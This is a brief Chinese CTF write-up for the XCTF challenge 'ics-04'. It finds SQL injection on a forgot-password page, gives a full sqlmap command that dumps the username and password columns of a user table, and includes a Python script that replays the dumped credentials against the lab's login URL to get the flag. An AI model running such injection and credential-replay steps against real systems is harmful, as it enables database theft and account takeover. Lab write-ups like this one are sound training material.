XCTF ics-04

根据题目提示在登录及注册中有漏洞

首先进入登录界面，寻求漏洞，BP抓包，发现为明文传输，第一个想到爆破，但是爆破结果不尽人意，没有任何用出；接下来进行SQL注入尝试，但是俩个界面均没有POST注入漏洞，正要放弃时，发现在登录界面还有一个忘记密码界面，尝试在该界面进行SQL注入，

python2 sqlmap.py -r post.txt --dump -C "username,password" -T "user" -D "cetc004"

放进sqlmap直接跑出user表内的内容，如下图所示

其中admin为测试时注册数据，第一个username为自身信息，后password则为其密码，但是该md5加密后的数据无法在寻常网站上解密，故，构造一个python的请求报文脚本，来获取flag

import requests

url = 'http://111.198.29.45:54376/login.php'

username = 'c3tlwDmIn23' 
password = '2f8667f381ff50ced6a3edc259260ba9'

payloads = { 'username':username, 'password':password }

r = requests.post(url, data = payloads) 

print (r.text)

获取到的flag如下图所示